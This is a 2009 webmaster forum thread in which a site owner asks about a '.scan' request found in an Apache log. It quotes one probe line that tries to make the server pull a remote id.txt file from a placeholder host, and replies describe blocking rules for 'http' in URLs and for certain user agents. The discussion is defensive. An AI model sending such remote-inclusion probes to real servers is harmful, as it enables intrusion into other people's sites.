Welcome to WebmasterWorld Guest from 3.227.2.109

Forum Moderators: Ocean10000 & phranque

Message Too Old, No Replies

Need to identify ".scan" exploit attempt

Russian server attempted to connect using .scanhttp and upload an exploit

     
1:01 am on Jul 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


Today I saw a new exploit attack in my Apache access log. I can't find any information via Google, so I am asking here. What exploit vector is this fellow in Saint Petersburg trying to use? I've never seen this one before and don't recognize the .scan control file type. What module uses that file type?

77.221.x.x - - [12/Jul/2009:13:44:09 -0700] GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"

Thanx in advance!

[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]

3:57 am on July 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


Oops! I'm sorry about that Jim.
5:16 pm on July 14, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Mar 31, 2002
posts:25430
votes: 0


No problem...

Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.

Too many exploiters, so little time: I say 403 and be done with it...

Jim

5:34 pm on July 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


I do block all http include attempts. This .scan vector is new to me and I can't find what application it belongs to. I'm just curious what they are trying to exploit by getting a hidden server function named scan.

BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.